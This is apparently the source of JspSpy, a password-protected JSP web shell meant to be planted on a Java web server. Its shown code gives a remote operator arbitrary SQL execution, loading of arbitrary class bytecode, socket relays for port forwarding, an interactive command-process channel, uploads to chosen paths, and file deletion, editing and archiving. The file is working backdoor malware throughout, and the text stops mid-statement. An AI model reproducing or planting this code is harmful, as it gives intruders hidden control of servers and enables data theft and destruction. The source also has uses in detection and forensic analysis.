<%@page pageEncoding="ISO-8859-7"%><%@page import="java.io.*"%><%@page impor

1. <%@page pageEncoding="ISO-8859-7"%>
2. <%@page import="java.io.*"%>
3. <%@page import="java.util.*"%>
4. <%@page import="java.util.regex.*"%>
5. <%@page import="java.sql.*"%>
6. <%@page import="java.lang.reflect.*"%>
7. <%@page import="java.nio.charset.*"%>
8. <%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
9. <%@page import="java.text.*"%>
10. <%@page import="java.net.*"%>
11. <%@page import="java.util.zip.*"%>
12. <%@page import="java.util.jar.*"%>
13. <%@page import="java.awt.*"%>
14. <%@page import="java.awt.image.*"%>
15. <%@page import="javax.imageio.*"%>
16. <%@page import="java.awt.datatransfer.DataFlavor"%>
17. <%@page import="java.util.prefs.Preferences"%>
18. <%@page import="javax.sql.DataSource"%>
19. <%@page import="org.springframework.web.context.WebApplicationContext"%>
20. <%@page import="org.springframework.web.context.support.WebApplicationContextUtils"%>
21. <%!private static final String PW = "chen-wei";
22. private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
23. private static final String REQUEST_CHARSET = "ISO-8859-1";
24. private static final String PAGE_CHARSET = "UTF-8";
25. private static final String CURRENT_DIR = "currentdir";
26. private static final String MSG = "SHOWMSG";
27. private static final String PORT_MAP = "PMSA";
28. private static final String DBO = "DBO";
29. private static final String SHELL_ONLINE = "SHELL_ONLINE";
30. private static final String ENTER = "ENTER_FILE";
31. private static final String ENTER_MSG = "ENTER_FILE_MSG";
32. private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR";
33. private static final String SESSION_O = "SESSION_O";
34. private static String SHELL_NAME = "";
35. private static String WEB_ROOT = null;
36. private static String SHELL_DIR = null;
37. public static Map ins = new HashMap();
38. private static boolean ISLINUX = false;
39.  
40. private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout.";
41. private static final String BACK_HREF = " <a href='javascript:history.back()'>Back</a>";
42.  
43. private static class MyRequest extends HttpServletRequestWrapper {
44. public MyRequest(HttpServletRequest req) {
45. super(req);
46. }
47.  
48. public String getParameter(String name) {
49. try {
50. String value = super.getParameter(name);
51. if (name == null)
52. return null;
53. return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET);
54. } catch (Exception e) {
55. return null;
56. }
57. }
58. }
59.  
60. private static class SpyClassLoader extends ClassLoader {
61. public SpyClassLoader() {
62. }
63.  
64. public Class defineClass(String name, byte[] b) {
65. return super.defineClass(name, b, 0, b.length - 2);
66. }
67. }
68.  
69. private static class DBOperator implements Serializable {
70. private Connection conn = null;
71. private Statement stmt = null;
72. private String driver;
73. private String url;
74. private String uid;
75. private String pwd;
76. private String dsStr;
77. private DataSource dataSource;
78. public DBOperator(DataSource dataSource,String dsStr,boolean connect){
79. this.dataSource = dataSource;
80. this.dsStr = dsStr;
81. if (connect){
82. try{
83. this.conn = dataSource.getConnection();
84. }catch(SQLException e){
85. e.printStackTrace();
86. }
87. }
88.  
89. }
90. public DBOperator(String driver, String url, String uid, String pwd)
91. throws Exception {
92. this(driver, url, uid, pwd, false);
93. }
94.  
95. public DBOperator(String driver, String url, String uid, String pwd,
96. boolean connect) throws Exception {
97. Class.forName(driver);
98. if (connect)
99. this.conn = DriverManager.getConnection(url, uid, pwd);
100. this.url = url;
101. this.driver = driver;
102. this.uid = uid;
103. this.pwd = pwd;
104. }
105.  
106. public void connect() throws Exception {
107. if(dataSource!=null){
108. this.conn = dataSource.getConnection();
109. }else{
110. this.conn = DriverManager.getConnection(url, uid, pwd);
111. }
112. }
113.  
114. public Object execute(String sql) throws Exception {
115. if (isValid()) {
116. stmt = conn.createStatement();
117. if (stmt.execute(sql)) {
118. return stmt.getResultSet();
119. } else {
120. return "" + stmt.getUpdateCount();
121. }
122. }
123. throw new Exception("Connection is inValid.");
124. }
125.  
126. public void closeStmt() throws Exception {
127. if (this.stmt != null)
128. stmt.close();
129. }
130.  
131. public boolean isValid() throws Exception {
132. return conn != null && !conn.isClosed();
133. }
134.  
135. public void close() throws Exception {
136. if (isValid()) {
137. closeStmt();
138. conn.close();
139. }
140. }
141.  
142. public boolean equals(Object o) {
143. if (o instanceof DBOperator) {
144. DBOperator dbo = (DBOperator) o;
145. return this.driver.equals(dbo.driver)
146. && this.url.equals(dbo.url) && this.uid.equals(dbo.uid)
147. && this.pwd.equals(dbo.pwd);
148. }
149. return false;
150. }
151.  
152. public Connection getConn() {
153. return this.conn;
154. }
155. }
156.  
157. private static class StreamConnector extends Thread {
158. private InputStream is;
159. private OutputStream os;
160.  
161. public StreamConnector(InputStream is, OutputStream os) {
162. this.is = is;
163. this.os = os;
164. }
165.  
166. public void run() {
167. BufferedReader in = null;
168. BufferedWriter out = null;
169. try {
170. in = new BufferedReader(new InputStreamReader(this.is));
171. out = new BufferedWriter(new OutputStreamWriter(this.os));
172. char buffer[] = new char[8192];
173. int length;
174. while ((length = in.read(buffer, 0, buffer.length)) > 0) {
175. out.write(buffer, 0, length);
176. out.flush();
177. }
178. } catch (Exception e) {
179. }
180. try {
181. if (in != null)
182. in.close();
183. if (out != null)
184. out.close();
185. } catch (Exception e) {
186. }
187. }
188.  
189. public static void readFromLocal(final DataInputStream localIn,
190. final DataOutputStream remoteOut) {
191. new Thread(new Runnable() {
192. public void run() {
193. while (true) {
194. try {
195. byte[] data = new byte[100];
196. int len = localIn.read(data);
197. while (len != -1) {
198. remoteOut.write(data, 0, len);
199. len = localIn.read(data);
200. }
201. } catch (Exception e) {
202. break;
203. }
204. }
205. }
206. }).start();
207. }
208.  
209. public static void readFromRemote(final Socket soc,
210. final Socket remoteSoc, final DataInputStream remoteIn,
211. final DataOutputStream localOut) {
212. new Thread(new Runnable() {
213. public void run() {
214. while (true) {
215. try {
216. byte[] data = new byte[100];
217. int len = remoteIn.read(data);
218. while (len != -1) {
219. localOut.write(data, 0, len);
220. len = remoteIn.read(data);
221. }
222. } catch (Exception e) {
223. try {
224. soc.close();
225. remoteSoc.close();
226. } catch (Exception ex) {
227. }
228. break;
229. }
230. }
231. }
232. }).start();
233. }
234. }
235.  
236. private static class EnterFile extends File {
237. private ZipFile zf = null;
238. private ZipEntry entry = null;
239. private boolean isDirectory = false;
240. private String absolutePath = null;
241.  
242. public void setEntry(ZipEntry e) {
243. this.entry = e;
244. }
245.  
246. public void setAbsolutePath(String p) {
247. this.absolutePath = p;
248. }
249.  
250. public void close() throws Exception {
251. this.zf.close();
252. }
253.  
254. public void setZf(String p) throws Exception {
255. if (p.toLowerCase().endsWith(".jar"))
256. this.zf = new JarFile(p);
257. else
258. this.zf = new ZipFile(p);
259. }
260.  
261. public EnterFile(File parent, String child) {
262. super(parent, child);
263. }
264.  
265. public EnterFile(String pathname) {
266. super(pathname);
267. }
268.  
269. public EnterFile(String pathname, boolean isDir) {
270. this(pathname);
271. this.isDirectory = isDir;
272. }
273.  
274. public EnterFile(String parent, String child) {
275. super(parent, child);
276. }
277.  
278. public EnterFile(URI uri) {
279. super(uri);
280. }
281.  
282. public boolean exists() {
283. return new File(this.zf.getName()).exists();
284. }
285.  
286. public File[] listFiles() {
287. java.util.List list = new ArrayList();
288. java.util.List handled = new ArrayList();
289. String currentDir = super.getPath();
290. currentDir = currentDir.replace('\\', '/');
291. if (currentDir.indexOf("/") == 0) {
292. if (currentDir.length() > 1)
293. currentDir = currentDir.substring(1);
294. else
295. currentDir = "";
296. }
297. Enumeration e = this.zf.entries();
298. while (e.hasMoreElements()) {
299. ZipEntry entry = (ZipEntry) e.nextElement();
300. String eName = entry.getName();
301. if (this.zf instanceof JarFile) {
302. if (!entry.isDirectory()) {
303. EnterFile ef = new EnterFile(eName);
304. ef.setEntry(entry);
305. try {
306. ef.setZf(this.zf.getName());
307. } catch (Exception ex) {
308. }
309. list.add(ef);
310. }
311. } else {
312. if (currentDir.equals("")) {
313. //zip root directory
314. if (eName.indexOf("/") == -1
315. || eName.matches("[^/]+/$")) {
316. EnterFile ef = new EnterFile(eName.replaceAll("/",
317. ""));
318. handled.add(eName.replaceAll("/", ""));
319. ef.setEntry(entry);
320. list.add(ef);
321. } else {
322. if (eName.indexOf("/") != -1) {
323. String tmp = eName.substring(0, eName
324. .indexOf("/"));
325. if (!handled.contains(tmp)
326. && !Util.isEmpty(tmp)) {
327. EnterFile ef = new EnterFile(tmp, true);
328. ef.setEntry(entry);
329. list.add(ef);
330. handled.add(tmp);
331. }
332. }
333. }
334. } else {
335. if (eName.startsWith(currentDir)) {
336. if (eName.matches(currentDir + "/[^/]+/?$")) {
337. //file.
338. EnterFile ef = new EnterFile(eName);
339. ef.setEntry(entry);
340. list.add(ef);
341. if (eName.endsWith("/")) {
342. String tmp = eName.substring(eName
343. .lastIndexOf('/',
344. eName.length() - 2));
345. tmp = tmp.substring(1, tmp.length() - 1);
346. handled.add(tmp);
347. }
348. } else {
349. //dir
350. try {
351. String tmp = eName.substring(currentDir
352. .length() + 1);
353. tmp = tmp.substring(0, tmp.indexOf('/'));
354. if (!handled.contains(tmp)
355. && !Util.isEmpty(tmp)) {
356. EnterFile ef = new EnterFile(tmp, true);
357. ef.setAbsolutePath(currentDir + "/"
358. + tmp);
359. ef.setEntry(entry);
360. list.add(ef);
361. handled.add(tmp);
362. }
363. } catch (Exception ex) {
364. }
365. }
366. }
367. }
368. }
369. }
370. return (File[]) list.toArray(new File[0]);
371. }
372.  
373. public boolean isDirectory() {
374. return this.entry.isDirectory() || this.isDirectory;
375. }
376.  
377. public String getParent() {
378. return "";
379. }
380.  
381. public String getAbsolutePath() {
382. return absolutePath != null ? absolutePath : super.getPath();
383. }
384.  
385. public String getName() {
386. if (this.zf instanceof JarFile) {
387. return this.getAbsolutePath();
388. } else {
389. return super.getName();
390. }
391. }
392.  
393. public long lastModified() {
394. return entry.getTime();
395. }
396.  
397. public boolean canRead() {
398. return false;
399. }
400.  
401. public boolean canWrite() {
402. return false;
403. }
404.  
405. public boolean canExecute() {
406. return false;
407. }
408.  
409. public long length() {
410. return entry.getSize();
411. }
412. }
413.  
414. private static class OnLineProcess {
415. private String cmd = "first";
416. private Process pro;
417.  
418. public OnLineProcess(Process p) {
419. this.pro = p;
420. }
421.  
422. public void setPro(Process p) {
423. this.pro = p;
424. }
425.  
426. public void setCmd(String c) {
427. this.cmd = c;
428. }
429.  
430. public String getCmd() {
431. return this.cmd;
432. }
433.  
434. public Process getPro() {
435. return this.pro;
436. }
437.  
438. public void stop() {
439. this.pro.destroy();
440. }
441. }
442.  
443. private static class OnLineConnector extends Thread {
444. private OnLineProcess ol = null;
445. private InputStream is;
446. private OutputStream os;
447. private String name;
448.  
449. public OnLineConnector(InputStream is, OutputStream os, String name,
450. OnLineProcess ol) {
451. this.is = is;
452. this.os = os;
453. this.name = name;
454. this.ol = ol;
455. }
456.  
457. public void run() {
458. BufferedReader in = null;
459. BufferedWriter out = null;
460. try {
461. in = new BufferedReader(new InputStreamReader(this.is));
462. out = new BufferedWriter(new OutputStreamWriter(this.os));
463. char buffer[] = new char[128];
464. if (this.name.equals("exeRclientO")) {
465. //from exe to client
466. int length = 0;
467. while ((length = in.read(buffer, 0, buffer.length)) > 0) {
468. String str = new String(buffer, 0, length);
469. str = str.replaceAll("&", "&amp;").replaceAll("<",
470. "&lt;").replaceAll(">", "&gt;");
471. str = str.replaceAll("" + (char) 13 + (char) 10,
472. "<br/>");
473. str = str.replaceAll("\n", "<br/>");
474. out.write(str.toCharArray(), 0, str.length());
475. out.flush();
476. }
477. } else {
478. //from client to exe
479. while (true) {
480. while (this.ol.getCmd() == null) {
481. Thread.sleep(500);
482. }
483. if (this.ol.getCmd().equals("first")) {
484. this.ol.setCmd(null);
485. continue;
486. }
487. this.ol.setCmd(this.ol.getCmd() + (char) 10);
488. char[] arr = this.ol.getCmd().toCharArray();
489. out.write(arr, 0, arr.length);
490. out.flush();
491. this.ol.setCmd(null);
492. }
493. }
494. } catch (Exception e) {
495. }
496. try {
497. if (in != null)
498. in.close();
499. if (out != null)
500. out.close();
501. } catch (Exception e) {
502. }
503. }
504. }
505.  
506. private static class Table {
507. private ArrayList rows = null;
508. private boolean echoTableTag = false;
509.  
510. public void setEchoTableTag(boolean v) {
511. this.echoTableTag = v;
512. }
513.  
514. public Table() {
515. this.rows = new ArrayList();
516. }
517.  
518. public void addRow(Row r) {
519. this.rows.add(r);
520. }
521.  
522. public String toString() {
523. StringBuffer html = new StringBuffer();
524. if (echoTableTag)
525. html.append("<table>");
526. for (int i = 0; i < rows.size(); i++) {
527. Row r = (Row) rows.get(i);
528. html
529. .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
530. ArrayList columns = r.getColumns();
531. for (int a = 0; a < columns.size(); a++) {
532. Column c = (Column) columns.get(a);
533. html.append("<td nowrap>");
534. String vv = Util.htmlEncode(Util.getStr(c.getValue()));
535. if (vv.equals(""))
536. vv = "&nbsp;";
537. html.append(vv);
538. html.append("</td>");
539. }
540. html.append("</tr>");
541. }
542. if (echoTableTag)
543. html.append("</table>");
544. return html.toString();
545. }
546.  
547. public static String rs2Table(ResultSet rs, String sep, boolean op)
548. throws Exception {
549. StringBuffer table = new StringBuffer();
550. ResultSetMetaData meta = rs.getMetaData();
551. int count = meta.getColumnCount();
552. if (!op)
553. table
554. .append("<b style='color:red;margin-left:15px'><i> View Struct </i></b> - <a href=\"javascript:doPost({o:'executesql'})\">View All Tables</a><br/><br/>");
555. else
556. table
557. .append("<b style='color:red;margin-left:15px'><i> All Tables </i></b><br/><br/>");
558. table
559. .append("<script>function view(t){document.getElementById('sql').value='select * from "
560. + sep + "'+t+'" + sep + "';}</script>");
561. table
562. .append("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
563. for (int i = 1; i <= count; i++) {
564. table.append("<td nowrap>" + meta.getColumnName(i) + "</td>");
565. }
566. if (op)
567. table.append("<td>&nbsp;</td>");
568. table.append("</tr>");
569. while (rs.next()) {
570. String tbName = null;
571. table
572. .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
573. for (int i = 1; i <= count; i++) {
574. String v = rs.getString(i);
575. if (i == 3)
576. tbName = v;
577. table.append("<td nowrap>" + Util.null2Nbsp(v) + "</td>");
578. }
579. if (op)
580. table
581. .append("<td nowrap> <a href=\"#\" onclick=\"view('"
582. + tbName
583. + "')\">View</a> | <a href=\"javascript:doPost({o:'executesql',type:'struct',table:'"
584. + tbName
585. + "'})\">Struct</a> | <a href=\"javascript:doPost({o:'export',table:'"
586. + tbName
587. + "'})\">Export </a> | <a href=\"javascript:doPost({o:'vExport',table:'"
588. + tbName + "'})\">Save To File</a> </td>");
589. table.append("</tr>");
590. }
591. table.append("</table><br/>");
592. return table.toString();
593. }
594. }
595.  
596. private static class Row {
597. private ArrayList cols = null;
598.  
599. public Row() {
600. this.cols = new ArrayList();
601. }
602.  
603. public void addColumn(Column n) {
604. this.cols.add(n);
605. }
606.  
607. public ArrayList getColumns() {
608. return this.cols;
609. }
610. }
611.  
612. private static class Column {
613. private String value;
614.  
615. public Column(String v) {
616. this.value = v;
617. }
618.  
619. public String getValue() {
620. return this.value;
621. }
622. }
623.  
624. private static class Util {
625. public static boolean isEmpty(String s) {
626. return s == null || s.trim().equals("");
627. }
628.  
629. public static boolean isEmpty(Object o) {
630. return o == null || isEmpty(o.toString());
631. }
632.  
633. public static String getSize(long size, char danwei) {
634. if (danwei == 'M') {
635. double v = formatNumber(size / 1024.0 / 1024.0, 2);
636. if (v > 1024) {
637. return getSize(size, 'G');
638. } else {
639. return v + "M";
640. }
641. } else if (danwei == 'G') {
642. return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G";
643. } else if (danwei == 'K') {
644. double v = formatNumber(size / 1024.0, 2);
645. if (v > 1024) {
646. return getSize(size, 'M');
647. } else {
648. return v + "K";
649. }
650. } else if (danwei == 'B') {
651. if (size > 1024) {
652. return getSize(size, 'K');
653. } else {
654. return size + "B";
655. }
656. }
657. return "" + 0 + danwei;
658. }
659.  
660. public static boolean exists(String[] arr, String v) {
661. for (int i = 0; i < arr.length; i++) {
662. if (v.equals(arr[i])) {
663. return true;
664. }
665. }
666. return false;
667. }
668.  
669. public static double formatNumber(double value, int l) {
670. NumberFormat format = NumberFormat.getInstance();
671. format.setMaximumFractionDigits(l);
672. format.setGroupingUsed(false);
673. return new Double(format.format(value)).doubleValue();
674. }
675.  
676. public static boolean isInteger(String v) {
677. if (isEmpty(v))
678. return false;
679. return v.matches("^\\d+$");
680. }
681.  
682. public static String formatDate(long time) {
683. SimpleDateFormat format = new SimpleDateFormat(
684. "yyyy-MM-dd hh:mm:ss");
685. return format.format(new java.util.Date(time));
686. }
687.  
688. public static String convertPath(String path) {
689. return path != null ? path.replace('\\', '/') : "";
690. }
691.  
692. public static String htmlEncode(String v) {
693. if (isEmpty(v))
694. return "";
695. return v.replaceAll("&", "&amp;").replaceAll("<", "&lt;")
696. .replaceAll(">", "&gt;");
697. }
698.  
699. public static String getStr(String s) {
700. return s == null ? "" : s;
701. }
702.  
703. public static String null2Nbsp(String s) {
704. if (s == null)
705. s = "&nbsp;";
706. return s;
707. }
708.  
709. public static String getStr(Object s) {
710. return s == null ? "" : s.toString();
711. }
712.  
713. public static String exec(String regex, String str, int group) {
714. Pattern pat = Pattern.compile(regex);
715. Matcher m = pat.matcher(str);
716. if (m.find())
717. return m.group(group);
718. return null;
719. }
720.  
721. public static void outMsg(Writer out, String msg) throws Exception {
722. outMsg(out, msg, "center");
723. }
724.  
725. public static void outMsg(Writer out, String msg, String align)
726. throws Exception {
727. out
728. .write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"
729. + align
730. + ";font-weight:bold;margin:10px\">"
731. + msg
732. + "</div>");
733. }
734.  
735. public static String highLight(String str) {
736. str = str
737. .replaceAll(
738. "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b",
739. "<span style='color:blue'>$1</span>");
740. str = str.replaceAll("\t(//.+)",
741. "\t<span style='color:green'>$1</span>");
742. return str;
743. }
744. }
745.  
746. private static class UploadBean {
747. private String fileName = null;
748. private String suffix = null;
749. private String savePath = "";
750. private ServletInputStream sis = null;
751. private OutputStream targetOutput = null;
752. private byte[] b = new byte[1024];
753.  
754. public void setTargetOutput(OutputStream stream) {
755. this.targetOutput = stream;
756. }
757.  
758. public UploadBean() {
759. }
760.  
761. public void setSavePath(String path) {
762. this.savePath = path;
763. }
764.  
765. public String getFileName() {
766. return this.fileName;
767. }
768.  
769. public void parseRequest(HttpServletRequest request) throws IOException {
770. sis = request.getInputStream();
771. int a = 0;
772. int k = 0;
773. String s = "";
774. while ((a = sis.readLine(b, 0, b.length)) != -1) {
775. s = new String(b, 0, a, PAGE_CHARSET);
776. if ((k = s.indexOf("filename=\"")) != -1) {
777. s = s.substring(k + 10);
778. k = s.indexOf("\"");
779. s = s.substring(0, k);
780. File tF = new File(s);
781. if (tF.isAbsolute()) {
782. fileName = tF.getName();
783. } else {
784. fileName = s;
785. }
786. k = s.lastIndexOf(".");
787. suffix = s.substring(k + 1);
788. upload();
789. }
790. }
791. }
792.  
793. private void upload() throws IOException {
794. try {
795. OutputStream out = null;
796. if (this.targetOutput != null)
797. out = this.targetOutput;
798. else
799. out = new FileOutputStream(new File(savePath, fileName));
800. int a = 0;
801. int k = 0;
802. String s = "";
803. while ((a = sis.readLine(b, 0, b.length)) != -1) {
804. s = new String(b, 0, a);
805. if ((k = s.indexOf("Content-Type:")) != -1) {
806. break;
807. }
808. }
809. sis.readLine(b, 0, b.length);
810. while ((a = sis.readLine(b, 0, b.length)) != -1) {
811. s = new String(b, 0, a);
812. if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45)
813. && (b[3] == 45) && (b[4] == 45)) {
814. break;
815. }
816. out.write(b, 0, a);
817. }
818. if (out instanceof FileOutputStream)
819. out.close();
820. } catch (IOException ioe) {
821. throw ioe;
822. }
823. }
824. }%>
825. <%
826.  
827. SHELL_NAME = "one6.action";
828. String myAbsolutePath = application.getRealPath(request
829. .getServletPath());
830. if (Util.isEmpty(myAbsolutePath)) {//for weblogic
831. SHELL_NAME = request.getServletPath();
832. myAbsolutePath = new File(application.getResource("/")
833. .getPath()
834. + SHELL_NAME).toString();
835. SHELL_NAME = request.getContextPath() + SHELL_NAME;
836. WEB_ROOT = new File(application.getResource("/").getPath())
837. .toString();
838. } else {
839. WEB_ROOT = application.getRealPath("/");
840. }
841. SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,
842. myAbsolutePath.lastIndexOf(File.separator)));
843. if (SHELL_DIR.indexOf('/') == 0)
844. ISLINUX = true;
845. else
846. ISLINUX = false;
847. if (session.getAttribute(CURRENT_DIR) == null)
848. session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR));
849. //request = new MyRequest(request);
850. if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null
851. || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
852. String o = request.getParameter("o");
853. if(o != null)
854. o = new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET);
855. if (o != null && o.equals("login")) {
856. ((Invoker) ins.get("login")).invoke(request, response,
857. session);
858. return;
859. } else if (o != null && o.equals("vLogin")) {
860. ((Invoker) ins.get("vLogin")).invoke(request, response,
861. session);
862. return;
863. } else {
864. ((Invoker) ins.get("vLogin")).invoke(request, response,
865. session);
866. return;
867. }
868. }
869. %>
870. <%!private static interface Invoker {
871. public void invoke(HttpServletRequest request,
872. HttpServletResponse response, HttpSession JSession)
873. throws Exception;
874.  
875. public boolean doBefore();
876.  
877. public boolean doAfter();
878. }
879.  
880. private static class DefaultInvoker implements Invoker {
881. public void invoke(HttpServletRequest request,
882. HttpServletResponse response, HttpSession JSession)
883. throws Exception {
884. }
885.  
886. public boolean doBefore() {
887. return true;
888. }
889.  
890. public boolean doAfter() {
891. return true;
892. }
893. }
894.  
895. private static class ScriptInvoker extends DefaultInvoker {
896. public void invoke(HttpServletRequest request,
897. HttpServletResponse response, HttpSession JSession)
898. throws Exception {
899. try {
900. PrintWriter out = response.getWriter();
901. out
902. .println("<script type=\"text/javascript\">"
903. + " String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"
904. + " function fso(obj) {"
905. + " this.currentDir = '"
906. + JSession.getAttribute(CURRENT_DIR)
907. + "';"
908. + " this.filename = obj.filename;"
909. + " this.path = obj.path;"
910. + " this.filetype = obj.filetype;"
911. + " this.charset = obj.charset;"
912. + " };"
913. + " fso.prototype = {"
914. + " copy:function(){"
915. + " var path = prompt('Copy To : ',this.path);"
916. + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"
917. + " doPost({o:'copy',src:this.path,to:path});"
918. + " },"
919. + " move:function() {"
920. + " var path =prompt('Move To : ',this.path);"
921. + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"
922. + " doPost({o:'move',src:this.path,to:path})"
923. + " },"
924. + " vEdit:function() {"
925. + " if (!this.charset)"
926. + " doPost({o:'vEdit',filepath:this.path});"
927. + " else"
928. + " doPost({o:'vEdit',filepath:this.path,charset:this.charset});"
929. + " },"
930. + " down:function() {"
931. + " doPost({o:'down',path:this.path})"
932. + " },"
933. + " removedir:function() {"
934. + " if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"
935. + " doPost({o:'removedir',dir:this.path});"
936. + " },"
937. + " mkdir:function() {"
938. + " var name = prompt('Input New Directory Name','');"
939. + " if (name == null || name.trim().length == 0)return;"
940. + " doPost({o:'mkdir',name:name});"
941. + " },"
942. + " subdir:function(out) {"
943. + " doPost({o:'filelist',folder:this.path,outentry:(out || 'none')})"
944. + " },"
945. + " parent:function() {"
946. + " var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"
947. + " doPost({o:'filelist',folder:parent})"
948. + " },"
949. + " createFile:function() {"
950. + " var path = prompt('Input New File Name','');"
951. + " if (path == null || path.trim().length == 0) return;"
952. + " doPost({o:'vCreateFile',filepath:path})"
953. + " },"
954. + " deleteBatch:function() {"
955. + " if (!confirm('Are You Sure To Delete These Files?')) return;"
956. + " var selected = new Array();"
957. + " var inputs = document.getElementsByTagName('input');"
958. + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"
959. + " if (selected.length == 0) {alert('No File Selected');return;}"
960. + " doPost({o:'deleteBatch',files:selected.join(',')})"
961. + " },"
962. + " packBatch:function() {"
963. + " var selected = new Array();"
964. + " var inputs = document.getElementsByTagName('input');"
965. + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"
966. + " if (selected.length == 0) {alert('No File Selected');return;}"
967. + " var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"
968. + " if (savefilename == null || savefilename.trim().length == 0)return;"
969. + " doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"
970. + " },"
971. + " pack:function(showconfig) {"
972. + " if (showconfig && confirm('Need Pack Configuration?')) {doPost({o:'vPack',packedfile:this.path});return;}"
973. + " var tmpName = '';"
974. + " if (this.filename.indexOf('.') == -1) tmpName = this.filename;"
975. + " else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"
976. + " tmpName += '.zip';"
977. + " var path = this.path;"
978. + " var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"
979. + " if (name == null || path.trim().length == 0) return;"
980. + " doPost({o:'pack',packedfile:path,savefilename:name})"
981. + " },"
982. + " vEditProperty:function() {"
983. + " var path = this.path;"
984. + " doPost({o:'vEditProperty',filepath:path})"
985. + " },"
986. + " unpack:function() {"
987. + " var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"
988. + " if (path == null || path.trim().length == 0) return;"
989. + " doPost({o:'unpack',savepath:path,zipfile:this.path})"
990. + " },"
991. + " enter:function() {"
992. + " doPost({o:'enter',filepath:this.path})"
993. + " }"
994. + " };"
995. + " function doPost(obj) {"
996. + " var form = document.forms[\"doForm\"];"
997. + " var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"
998. + " for (var pro in obj)"
999. + " {"
1000. + " var input = document.createElement(\"input\");"
1001. + " input.type = \"hidden\";"
1002. + " input.name = pro;"
1003. + " input.value = obj[pro];"
1004. + " form.appendChild(input);"
1005. + " }"
1006. + " form.submit();" + " }" + "</script>");
1007.  
1008. } catch (Exception e) {
1009.  
1010. throw e;
1011. }
1012. }
1013. }
1014.  
1015. private static class BeforeInvoker extends DefaultInvoker {
1016. public void invoke(HttpServletRequest request,
1017. HttpServletResponse response, HttpSession JSession)
1018. throws Exception {
1019. try {
1020. PrintWriter out = response.getWriter();
1021. out
1022. .println("<html><head><title>JspSpy</title><style type=\"text/css\">"
1023. + "body,td{font: 12px Arial,Tahoma;line-height: 16px;}"
1024. + ".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"
1025. + ".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"
1026. + ".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"
1027. + "a {color: #00f;text-decoration:underline;}"
1028. + "a:hover{color: #f00;text-decoration:none;}"
1029. + ".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"
1030. + ".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"
1031. + ".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"
1032. + ".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"
1033. + ".head td span{font-weight:normal;}"
1034. + "form{margin:0;padding:0;}"
1035. + "h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"
1036. + "ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"
1037. + "u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"
1038. + ".secho{height:400px;width:100%;overflow:auto;border:none}"
1039. + "hr{border: 1px solid rgb(221, 221, 221); height: 0px;}"
1040. + "</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
1041. } catch (Exception e) {
1042.  
1043. throw e;
1044. }
1045. }
1046. }
1047.  
1048. private static class AfterInvoker extends DefaultInvoker {
1049. public void invoke(HttpServletRequest request,
1050. HttpServletResponse response, HttpSession JSession)
1051. throws Exception {
1052. try {
1053. PrintWriter out = response.getWriter();
1054. out.println("</body></html>");
1055. } catch (Exception e) {
1056.  
1057. throw e;
1058. }
1059. }
1060. }
1061.  
1062. private static class DeleteBatchInvoker extends DefaultInvoker {
1063. public boolean doBefore() {
1064. return false;
1065. }
1066.  
1067. public boolean doAfter() {
1068. return false;
1069. }
1070.  
1071. public void invoke(HttpServletRequest request,
1072. HttpServletResponse response, HttpSession JSession)
1073. throws Exception {
1074. try {
1075. String files = request.getParameter("files");
1076. int success = 0;
1077. int failed = 0;
1078. if (!Util.isEmpty(files)) {
1079. String currentDir = JSession.getAttribute(CURRENT_DIR)
1080. .toString();
1081. String[] arr = files.split(",");
1082. for (int i = 0; i < arr.length; i++) {
1083. String fs = arr[i];
1084. File f = new File(currentDir, fs);
1085. if (f.delete())
1086. success += 1;
1087. else
1088. failed += 1;
1089. }
1090. }
1091. JSession
1092. .setAttribute(
1093. MSG,
1094. success
